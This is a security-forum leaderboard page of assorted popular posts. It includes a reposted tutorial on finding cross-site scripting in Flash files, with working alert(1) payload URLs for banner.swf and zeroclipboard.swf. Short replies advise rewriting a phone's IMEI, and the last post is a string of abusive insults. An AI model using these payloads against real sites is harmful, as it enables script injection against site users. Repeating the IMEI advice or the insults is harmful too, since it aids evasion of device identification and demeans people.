
Leaderboard

Popular Content

Showing content with the highest reputation on 06/03/16 in all areas

  1. It's .XYZ's second birthday! To celebrate, Namecheap is offering a cool deal on this hot TLD - just $0.02 on the 1st & 2nd of this month! Late to the party? No problem, get .xyz for just 15 cents for the rest of June. Link: https://www.namecheap.com/domains/registration/gtld/xyz.aspx You also get WhoisGuard for free.
    2 points
  2. Looking for experienced programmers (5-10 years)
     Requirements:
     - Good knowledge of php, mysql, javascript (css/html/bootstrap)
     - Knowledge of open source platforms (example: wordpress)
     - Ability to communicate and work in a team
     - Availability for a full-time job (Bucharest/Universitate)
     Benefits:
     - Good salary package (1000-5000 EURO, depending on experience)
     - Training, courses (we support you if you want to learn)
     - Coffee, tea, books at your discretion (you will work in a very relaxed environment)
     - Young and open-minded colleagues ;-)
     If you meet the requirements, you can send me your CV / projects to office@kapye.com or by PM.
    1 point
  3. With xposed and their framework you can rewrite it, or with mobile uncle tools; still, what is the model, since we can't read it off a crystal ball..
    1 point
  4. .......................
    1 point
  5. Avast, yeah... hahahha
    1 point
  6. Sirin Labs launches ultra-secure, ultra-expensive Solarin smartphone

     It's the 'best' and 'most secure' phone ever made, its maker claims.

     By Charles McLellan for Product Central | May 31, 2016 -- 20:40 GMT (21:40 BST) | Topic: Smartphones

     Sirin Labs' co-founders Kenes Rakishev, Moshe Hogeg and Tal Cohen launch the Solarin smartphone in London. Image: Charles McLellan/ZDNet

     If you're a startup launching into the hyper-competitive smartphone market, then -- as well as plenty of funding and nerves of steel -- you'll need to target a sector with room for yet another vendor. Sirin Labs, co-founded in 2013 by Kenes Rakishev (chairman), Moshe Hogeg (president) and Tal Cohen (CEO), is funded to the tune of $72 million (£49.6m) and launched its first product, Solarin -- which Hogeg confidently described as "the best phone ever made, and for sure the most secure phone ever made" -- in central London today. Solarin is also one of the most expensive smartphones ever made, starting at £9,500/$14,800 plus taxes.

     Despite its price, the 5.5-inch Android-based Solarin is largely free of 'bling'-style decoration. Image: Sirin Labs

     Of course, expensive smartphones are available from the likes of Vertu, and secure ones from Silent Circle and others, so Sirin Labs isn't exactly entering virgin territory. But if you're a business leader, entrepreneur or financier with a lot of confidential information, a lot of communication needs, and the wherewithal to drop ten grand (sterling) on a phone, then Sirin Labs thinks you're a potential customer.

     Despite its price, Solarin isn't an over-decorated 'bling' phone. Indeed, this Swedish-designed-and-built Android (5.1) handset looks relatively restrained. It packs a decent, if not always cutting-edge, specification, including:
     - A 2GHz Qualcomm Snapdragon 810 octa-core SoC with 4GB of RAM and 128GB of internal storage;
     - A 5.5-inch Gorilla Glass 4-protected IPS LCD with 2,560 by 1,440 resolution (538ppi), delivering 120 percent of the sRGB colour gamut, 1,500:1 typical contrast ratio and 600cd/m2 typical brightness;
     - A 24-megapixel main camera with laser autofocus, quad-tone flash, optical image stabilisation and 4k video recording at 30fps, plus an 8-megapixel front camera with flash, electrical image stabilisation and HD video recording at 60fps;
     - An audio subsystem comprising three bass-boosted speakers and four microphones, plus a smart amplifier designed to maximise volume while minimising distortion;
     - Support for 24 LTE bands, 802.11ac wi-fi with 2x2 MU-MIMO and 60GHz WiGig; and
     - A 4,040mAh li-ion battery with claimed talk time of 31 hours (UMTS), standby time of 'over 2 weeks' and Qualcomm QuickCharge 2.0 support

     "Whenever you see something in our spec that isn't the latest, there's a very good reason for that," said CEO Tal Cohen at the launch, citing the 2k screen's combination of brightness, colour gamut and power consumption as an advantage over a 4k screen as an example.

     The Solarin measures 78mm wide by 159.8mm deep by 11.1mm thick, weighs 243g, is water/dust resistant to IP54 level and comes in Fibre Black Carbon Titanium, Fibre Black Carbon DLC, Fibre Black Carbon Yellow Gold and Crystal White Carbon DLC variants.

     Security

     Solarin's Security Shield mode offers hardware-based, end-to-end encrypted VoIP calls and messages. Image: Charles McLellan/ZDNet

     Security is Sirin Labs' main focus, and its solution for the Solarin phone comprises three main elements:
     - Mobile threat protection from Zimperium, offering continuous protection against network, host-based and physical attacks;
     - Encrypted email powered by ProtonMail, which combines public-key cryptography with symmetric encryption protocols to offer end-to-end encryption via a 2-password system; and
     - Security Shield from KoolSpan, which enables hardware-based, end-to-end encrypted VoIP calls and messages using military-grade AES-256, FIPS 140-2 encryption.

     Security Shield mode is activated via a sliding Security Switch above the camera lens (diamond-inlaid, naturally), which also shuts down unnecessary operations on the phone.

     Is Sirin Labs' Solarin the best and most secure phone ever made, as co-founder and president Moshe Hogeg claims? Given the price, it'll need to be, and we look forward to investigating further in a full review in due course. If that ten grand is burning a hole in your pocket, the Solarin is available online now, at Sirin Labs' store in London's Mayfair (34 Bruton Place) from 1 June, and from Harrods in Knightsbridge from 30 June.

     Update, June 2 2016

     Vertu is the best-known name in the 'luxury technology' market, and ZDNet asked CEO Gordon Watson for his reactions to Sirin Labs' Solarin launch: "Vertu is always interested to see new entrants in the luxury technology space and we welcome competition to the market. While that category has had many players over the years, Vertu has often been a lone voice within it. However, while the luxury technology category is growing, competing within it is tough, particularly with high-end or luxury mobile phones. Vertu has been honing its business for 18 years and continues to innovate in order to keep pace with changes in both the technology and luxury industries," said Watson.

     On the Solarin phone's emphasis on security and design/build quality rather than overtly luxurious features, Watson had this to say: "At this stage we've not seen the product first hand, so it would be impossible to judge it fairly. Vertu's smartphone products have been the brand's best sellers over the last three years and these combine leading-edge technology, precision-engineered build and a suite of personalised and curated services -- the combination of these three elements are vital to Vertu and allow us to offer a unique proposition."

     "We also believe that e-commerce, a global retail network and strong after-sales care add significantly to the consumer experience. Security has been a fundamental of the Vertu brand since the launch of its Signature S model in 2002 and the company continues to work closely with in-house security experts as well as external partners -- not least Google -- to ensure that customers are fully protected."

     And on Vertu's roadmap: "Vertu switched investment partners in the last quarter of 2015, moving to a team with knowledge of both the technology industry and the evolving Asian luxury market. The benefits of this new investment and expertise will be seen with a series of product launches in the latter part of 2016 and beyond."

     Source: http://www.zdnet.com/article/sirin-labs-launches-ultra-secure-ultra-expensive-solarin-smartphone/
    1 point
  7. It gets written with a z3x box and costs around 50 lei at a service shop
    1 point
  8. I have a utok 351D with a different IMEI and it works perfectly, I have no problems with messages/calls.
    1 point
  9. 25 May 2016 on security

     Over the years I found a lot of cross-site scripting vulnerabilities in flash files (recognizable by the .swf extension). Finding cross-site scripting vulnerabilities in flash files is some sort of a hobby for me because it almost always succeeds. It's pretty obvious that the awareness of cross-site scripting vulnerabilities is even lower than that of PHP developers.

     To start, unfortunately you can't do "right mouse click, view-source" on a flash file, but fortunately there are a couple of tools that can do it for you. For example http://www.showmycode.com/. A large list of tools can be found here: http://bruce-lab.blogspot.nl/2010/08/freeswfdecompilers.html

     To demonstrate how I analyze a flash file I'm going to use the banner.swf file and the zeroclipboard.swf cross-site scripting as examples, of which the banner.swf is a commonly known mistake and the zeroclipboard.swf file is a known vulnerable flash file that was made public in 2012 on Github (https://github.com/zeroclipboard/zeroclipboard/issues/14).

     banner.swf

     This vulnerability is pretty basic. When the clicktag function in Actionscript allows unfiltered user input it can be used to inject javascript URLs, for example javascript:alert(1). The getUrl function is used a lot and is often poorly filtered or not filtered at all. An example of a vulnerable flash file decompiled via showmycode:

         on (release) {
             geturl (_root.clickTAG, "_self");
         }

     on (release) is a trigger that executes code when the mouse is pressed, and _root.clickTAG stands for the clickTAG parameter, which is not escaped whatsoever and is therefore vulnerable to cross-site scripting attacks. The vulnerability can be reproduced by following these steps:
     - Go to banner.swf?clickTAG=javascript:alert(1)
     - Press on the page (anywhere in this case)

     zeroclipboard.swf

     Zeroclipboard is a library used to modify the user's clipboard, often used to provide a "copy to clipboard" functionality. This vulnerability is a bit more complex than the banner.swf. Huge companies like coindesk and Yahoo were vulnerable to this vulnerability, so for me it's pretty interesting to know where this issue originated from. To start our search we need a vulnerable zeroclipboard file. A mirror of the vulnerable version can be downloaded here: http://github.com/cure53/Flashbang/raw/master/flash-files/files/ZeroClipboard.swf

     I decompiled the source using showmycode:

         package {
             import flash.events.*;
             import flash.display.*;
             import flash.external.*;
             import flash.system.*;
             import flash.utils.*;

             public class ZeroClipboard extends Sprite {
                 private var button:Sprite;
                 private var id:String = "";
                 private var clipText:String = "";

                 public function ZeroClipboard(){
                     super();
                     stage.scaleMode = StageScaleMode.EXACT_FIT;
                     Security.allowDomain("*");
                     var flashvars:* = LoaderInfo(this.root.loaderInfo).parameters;
                     id = flashvars.id;
                     button = new Sprite();
                     button.buttonMode = true;
                     button.useHandCursor = true;
                     button.graphics.beginFill(0xCCFF00);
                     button.graphics.drawRect(0, 0, Math.floor(flashvars.width), Math.floor(flashvars.height));
                     button.alpha = 0;
                     addChild(button);
                     button.addEventListener(MouseEvent.CLICK, clickHandler);
                     button.addEventListener(MouseEvent.MOUSE_OVER, function (_arg1:Event){
                         ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseOver", null);
                     });
                     button.addEventListener(MouseEvent.MOUSE_OUT, function (_arg1:Event){
                         ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseOut", null);
                     });
                     button.addEventListener(MouseEvent.MOUSE_DOWN, function (_arg1:Event){
                         ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseDown", null);
                     });
                     button.addEventListener(MouseEvent.MOUSE_UP, function (_arg1:Event){
                         ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseUp", null);
                     });
                     ExternalInterface.addCallback("setHandCursor", setHandCursor);
                     ExternalInterface.addCallback("setText", setText);
                     ExternalInterface.call("ZeroClipboard.dispatch", id, "load", null);
                 }

                 public function setHandCursor(_arg1:Boolean){
                     button.useHandCursor = _arg1;
                 }

                 private function clickHandler(_arg1:Event):void{
                     System.setClipboard(clipText);
                     ExternalInterface.call("ZeroClipboard.dispatch", id, "complete", clipText);
                 }

                 public function setText(_arg1){
                     clipText = _arg1;
                 }
             }
         }//package

     The function we are searching for is ExternalInterface.call. This function is used to call JavaScript functions from flash files and it's unreliable. When unfiltered input is passed to this function it's possible to inject your own JavaScript. A quick search for ExternalInterface.call returned:

         ExternalInterface.call("ZeroClipboard.dispatch", id, "complete", clipText);

     What we have to do now is find out how this function gets triggered. The example I used sits within a function called clickHandler, so I did a quick search for clickHandler and found that it gets triggered when there is a click on an element named "button". What is button? Well, button = new Sprite(); which is a class used for user interface components. Let's take a look at the part where the sprite is created:

         button = new Sprite();
         button.buttonMode = true;
         button.useHandCursor = true;
         button.graphics.beginFill(0xCCFF00);
         button.graphics.drawRect(0, 0, Math.floor(flashvars.width), Math.floor(flashvars.height));
         button.alpha = 0;
         addChild(button);

     By looking at this part you might already have noticed the 5th line.

         button.graphics.drawRect(0, 0, Math.floor(flashvars.width), Math.floor(flashvars.height));

     This part determines the width and height of the button sprite by using two variables: flashvars.width and flashvars.height. To find out where these parameters are set we don't have to look very far. By searching for flashvars it's pretty easy to find out that flashvars stands for LoaderInfo(this.root.loaderInfo).parameters; which is used to get the parameters from a request. So, to set the width and height of the button element we have to add two parameters to the zeroclipboard.swf file in the URL. Now, when the mouse is hovered over the button the function clickHandler will be called, which triggers the vulnerable part of code that we want to reach.

         /zeroclipboard.swf?width=1000&height=1000

     Now we have to exploit the vulnerable part of code; let's get back to the vulnerable line:

         ExternalInterface.call("ZeroClipboard.dispatch", id, "complete", clipText);

     The id variable actually is user input; you can see that by searching for the id variable. In the code you will find id = flashvars.id; So, now we know that the variable id can be set by requesting the flash file with the parameter id (I almost could have guessed it..). To turn this into a cross-site scripting we first have to know how ActionScript generates the JavaScript code for the ExternalInterface.call. The code looks like this:

         try { __flash__toXML(ZeroClipboard.dispatch("USER INPUT HERE","load",null)) ; } catch (e) { "<undefined/>"; }

     User input is located at "USER INPUT HERE", so that is where we should try to break out. First we need to get out of the double quotes. We can't just do this by typing " because ActionScript does escape this input. Luckily it can be escaped by adding a backslash in front of it. So our payload needs to start with \". This will turn the generated JavaScript into:

         try { __flash__toXML(ZeroClipboard.dispatch("\\"","load",null)) ; } catch (e) { "<undefined/>"; }

     All we have to do now is inject our own script and make sure that it's valid JavaScript. First, let's add two forward slashes at the end of our payload. By adding two forward slashes at the end of our payload, JavaScript will see everything behind it as a comment.

         try { __flash__toXML(ZeroClipboard.dispatch("\\"//","load",null)) ; } catch (e) { "<undefined/>"; }

     Because we chopped off the end of the function it now looks like this:

         try { __flash__toXML(ZeroClipboard.dispatch("\\"

     This is invalid JavaScript, but we can fix that! Let's start by ending the two functions ZeroClipboard.dispatch and __flash__toXML. Our payload now looks like this: \"))// and the generated JavaScript looks like this:

         try { __flash__toXML(ZeroClipboard.dispatch("\\"))

     Now we have to end the try statement; we do this by using } catch(e) {}. Our payload now looks like this: \"))} catch(e) {}// and the generated JavaScript looks like this:

         try { __flash__toXML(ZeroClipboard.dispatch("\\"))} catch(e) {}

     This is perfectly valid JavaScript; all we have to do now is inject our payload. We can add the payload (for example, an alert) in the catch statement like this: \"))} catch(e) {alert(1);}// which makes the final URL:

         /zeroclipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000

     List of known vulnerable flash files

     I started a public spreadsheet where everybody can contribute to make a list of vulnerable SWF files. You can contribute to the list here: https://docs.google.com/spreadsheets/d/1zWc4Sf0pk_6lDVG0Lm-SjFbVVR8hY5X9WoKJNPhGWCs

     Flashbang

     An awesome tool that can help you to find vulnerabilities in flash files is flashbang. It can be found here: https://cure53.de/flashbang. It's created by cure53 (obviously) and it's even open source on Github, available here: https://github.com/cure53/Flashbang

     Resources
     - http://donncha.is/2013/06/coinbase-owning-a-bitcoin-exchange-bug-bounty-program/
     - https://github.com/DBA/swf_file
     - https://github.com/cure53/Flashbang
     - https://github.com/zeroclipboard/zeroclipboard/issues/14
     - http://bruce-lab.blogspot.nl/2010/08/freeswfdecompilers.html

     smiegles

     Source: https://olivierbeg.com/finding-xss-vulnerabilities-in-flash-files/
    1 point
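Added example, not part of the post above and not code from the ZeroClipboard project: a small JavaScript model of the quote-only escaping the post describes for ExternalInterface.call, a scanner that checks whether an id value still lands entirely inside the generated string literal, and the allowlist validation for the id and clickTAG flashvars that a defender would apply before either value reaches ExternalInterface.call or getURL. The escaping model, the function names and all sample inputs are constructed from the post's description, not taken from Flash's real implementation.

```javascript
// Added example (constructed): why quote-only escaping leaks, and the
// input validation that prevents both issues described in the post.

// Escaping as the post describes Flash's behaviour: a double quote becomes
// \" but a backslash is passed through unchanged (assumption, modelled
// from the post, not Flash's actual code).
function flashStyleEscape(s) {
  return s.replace(/"/g, '\\"');
}

// Correct escaping for a JS string literal: JSON.stringify escapes the
// backslash first, so a leading \ can no longer neutralise the \" escape.
function properEscape(s) {
  return JSON.stringify(s).slice(1, -1);
}

// The JavaScript Flash hands to the browser for the "load" dispatch,
// with the escaped id spliced in (template copied from the post).
function buildDispatchCall(id, escapeFn) {
  return 'try { __flash__toXML(ZeroClipboard.dispatch("' + escapeFn(id) +
         '","load",null)) ; } catch (e) { "<undefined/>"; }';
}

// Scan a double-quoted JS string literal that opens at openIdx and return
// the index of its closing quote (honouring backslash escapes), or -1.
function stringLiteralEnd(js, openIdx) {
  for (let i = openIdx + 1; i < js.length; i++) {
    if (js[i] === '\\') { i++; continue; }   // skip the escaped character
    if (js[i] === '"') return i;
  }
  return -1;
}

// True when the literal closes exactly at the template's own closing quote,
// i.e. the whole escaped id stayed inside the string and nothing broke out.
function idStaysInsideLiteral(id, escapeFn) {
  const js = buildDispatchCall(id, escapeFn);
  const open = js.indexOf('"');
  const expectedClose = open + 1 + escapeFn(id).length;
  return stringLiteralEnd(js, open) === expectedClose;
}

// Defensive allowlist for the id flashvar: an identifier, nothing else.
const SAFE_ID = /^[A-Za-z0-9_-]{1,64}$/;
function isSafeId(id) {
  return typeof id === 'string' && SAFE_ID.test(id);
}

// Defensive check for clickTAG: only absolute http(s) URLs are accepted,
// so javascript: and other schemes are rejected before getURL sees them.
function isSafeClickTag(url) {
  try {
    const u = new URL(url);
    return u.protocol === 'http:' || u.protocol === 'https:';
  } catch (e) {
    return false;                             // not a parseable absolute URL
  }
}

// Constructed sample: the id value from the post's final URL.
const PAYLOAD = '\\"))} catch(e) {alert(1);}//';

if (typeof require !== 'undefined' && require.main === module) {
  console.log('benign id contained (flash escaping):',
              idStaysInsideLiteral('clip1', flashStyleEscape));   // true
  console.log('payload contained (flash escaping):',
              idStaysInsideLiteral(PAYLOAD, flashStyleEscape));   // false
  console.log('payload contained (proper escaping):',
              idStaysInsideLiteral(PAYLOAD, properEscape));       // true
  console.log('payload passes allowlist:', isSafeId(PAYLOAD));    // false
  console.log('javascript: clickTAG accepted:',
              isSafeClickTag('javascript:alert(1)'));             // false
}
```

The scanner only models the string-literal boundary, which is the part the post reasons about; it does not execute anything. The two validators are the practical takeaway: an allowlist on id and a scheme check on clickTAG make the escaping question moot, which is the fix an SWF author should apply regardless of how the decompiled code looks.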
  10. Tor Messenger Beta: Chat over Tor, Easily

      Posted October 29th, 2015 by sukhbir

      Today we are releasing a new, beta version of Tor Messenger, based on Instantbird, an instant messaging client developed in the Mozilla community.

      What is it?

      Tor Messenger is a cross-platform chat program that aims to be secure by default and sends all of its traffic over Tor. It supports a wide variety of transport networks, including Jabber (XMPP), IRC, Google Talk, Facebook Chat, Twitter, Yahoo, and others; enables Off-the-Record (OTR) Messaging automatically; and has an easy-to-use graphical user interface localized into multiple languages.

      What it isn't...

      Tor Messenger builds on the networks you are familiar with, so that you can continue communicating in a way your contacts are willing and able to do. This has traditionally been in a client-server model, meaning that your metadata (specifically the relationships between contacts) can be logged by the server. However, your route to the server will be hidden because you are communicating over Tor. We are also excited about systems like Pond and Ricochet, which try to solve this problem, and would encourage you to look at their designs and use them too.

      Why Instantbird?

      We considered a number of messaging clients: Pidgin, Adam Langley's xmpp-client, and Instantbird. Instantbird was the pragmatic choice -- its transport protocols are written in a memory-safe language (JavaScript); it has a graphical user interface and already supports many natural languages; and it's a XUL application, which means we can leverage both the code (Tor Launcher) and in-house expertise that the Tor Project has developed working on Tor Browser with Firefox. It also has an active and vibrant software developer community that has been very responsive and understanding of our needs. The main feature it lacked was OTR support, which we have implemented and hope to upstream to the main Instantbird repository for the benefit of all Instantbird (and Thunderbird) users.

      Current Status

      Today we are releasing a beta version with which we hope to gain both usability and security related feedback. There have been three previous alpha releases to the mailing lists that have already helped smooth out some of the rougher edges.

      Downloads

      Linux (32-bit) | Linux (64-bit) | Windows | OS X | sha256sums.txt | sha256sums.txt.asc

      The sha256sums.txt file containing hashes of the bundles is signed with the key 0x6887935AB297B391 (fingerprint: 3A0B 3D84 3708 9613 6B84 5E82 6887 935A B297 B391).

      Instructions

      On Linux, extract the bundle(s) and then run:

          ./start-tor-messenger.desktop

      On OS X, copy the Tor Messenger application from the disk image to your local disk before running it. On all platforms, Tor Messenger sets the profile folder for Firefox/Instantbird to the installation directory.

      Note that as a policy, unencrypted one-to-one conversations are not allowed and your messages will not be transmitted if the person you are talking with does not have an OTR-enabled client. You can disable this option in the preferences to allow unencrypted communication but doing so is not recommended.

      Source Code

      We are doing automated builds of Tor Messenger for all platforms. The Linux builds are reproducible: anyone who builds Tor Messenger for Linux should have byte-for-byte identical binaries compared with other builds from a given source. You can build it yourself and let us know if you encounter any problems or cannot match our build. The Windows and OS X builds are not completely reproducible yet but we are working on it.

      What's to Come

      Our current focus is security, robustness and user experience. We will be fixing bugs and releasing updates as appropriate, and in the future, we plan on pairing releases with Mozilla's Extended Support Release (ESR) cycle.

      We have some ideas on where to take Tor Messenger but we would like to hear what you have to say. Some possibilities include:
      - Reproducible builds for Windows and OS X
      - Sandboxing
      - Automatic updates
      - Improved Tor support
      - OTR over Twitter DMs
      - Produce (and distribute) internationalized builds
      - Secure multi-party communication (np1sec)
      - Encrypted file-transfers
      - Usability study

      How To Help

      Give it a try and provide feedback, requests, and file bugs (choose the "Tor Messenger" component). If you are a developer, help us close all our tickets or help us review our design doc. As always, we are idling on IRC in #tor-dev (OFTC) (nicks: arlolra; boklm; sukhe) and subscribed to the tor-talk/dev mailing lists. Please note that this release is for users who would like to help us with testing the product but at the same time who also understand the risks involved in using beta software. Thanks and we hope you enjoy Tor Messenger!

      Source: https://blog.torproject.org/blog/tor-messenger-beta-chat-over-tor-easily
    1 point
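Added example, not from the Tor Project post above: a POSIX shell script that carries out the download check the post implies, namely confirming that sha256sums.txt carries a valid signature from the announced key (fingerprint taken from the post) and then checking one downloaded bundle against that file. The gpg invocation, the function names and the bundle file name used in the demo are assumptions; the demo data is constructed and needs no network access or gpg.

```shell
#!/bin/sh
# Added example (constructed): verify a Tor Messenger download against the
# signed sha256sums.txt. Fingerprint as stated in the announcement.
EXPECTED_FPR="3A0B3D84370896136B845E826887935AB297B391"

# Use sha256sum where available (coreutils), otherwise shasum -a 256 (macOS).
sha256_tool() {
  if command -v sha256sum >/dev/null 2>&1; then sha256sum "$@"
  else shasum -a 256 "$@"; fi
}

# Step 1: sha256sums.txt.asc must be a good signature over sha256sums.txt
# made by the expected key (either the signing subkey or its primary key
# fingerprint must match). Assumes gpg is installed and the key imported,
# e.g. gpg --recv-keys 0x6887935AB297B391. Returns 0 only on a match.
verify_sums_signature() {
  sig="$1"; sums="$2"
  gpg --status-fd 1 --verify "$sig" "$sums" 2>/dev/null |
    awk -v fpr="$EXPECTED_FPR" '
      /^\[GNUPG:\] VALIDSIG/ { if ($3 == fpr || $NF == fpr) ok = 1 }
      END { exit ok ? 0 : 1 }'
}

# Step 2: check one downloaded bundle against the (now trusted) sums file.
# Only the line naming that bundle is fed to the checker, so the other
# platforms' bundles listed in sha256sums.txt need not be present locally.
check_bundle_hash() {
  sums="$1"; bundle="$2"
  dir=$(dirname "$bundle"); name=$(basename "$bundle")
  line=$(grep -E "^[0-9a-fA-F]{64}  $name\$" "$sums") || return 1
  ( cd "$dir" && printf '%s\n' "$line" | sha256_tool -c --status - )
}

# Full procedure as a user would run it after downloading into one directory.
verify_download() {
  dir="$1"; bundle="$2"
  verify_sums_signature "$dir/sha256sums.txt.asc" "$dir/sha256sums.txt" || {
    echo "signature check FAILED for sha256sums.txt" >&2; return 1; }
  check_bundle_hash "$dir/sha256sums.txt" "$dir/$bundle" || {
    echo "hash MISMATCH for $bundle" >&2; return 1; }
  echo "$bundle verified"
}

# Demo with a constructed bundle and sums file (hash step only; no gpg).
demo() {
  tmp=$(mktemp -d)
  printf 'constructed bundle contents\n' > "$tmp/tor-messenger-linux64.tar.xz"
  ( cd "$tmp" && sha256_tool tor-messenger-linux64.tar.xz ) > "$tmp/sha256sums.txt"
  check_bundle_hash "$tmp/sha256sums.txt" "$tmp/tor-messenger-linux64.tar.xz" \
    && echo "demo: hash OK"
  printf 'tampered\n' >> "$tmp/tor-messenger-linux64.tar.xz"
  check_bundle_hash "$tmp/sha256sums.txt" "$tmp/tor-messenger-linux64.tar.xz" \
    || echo "demo: hash MISMATCH detected after tampering"
  rm -rf "$tmp"
}
demo
```

Usage on a real download is verify_download ~/Downloads tor-messenger-linux64.tar.xz (file names assumed). The signature is checked before the hash file is trusted, and the fingerprint is compared rather than the short key id, since a short id alone is not enough to pin the signer.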
  11. Your language already shows how much of an "idiot you can be". Do you think I care about your seniority in this community? Stop butting in like a handicapped person, because I don't need your "aborted child" insults. So get the hell out and mind your own business.
    -6 points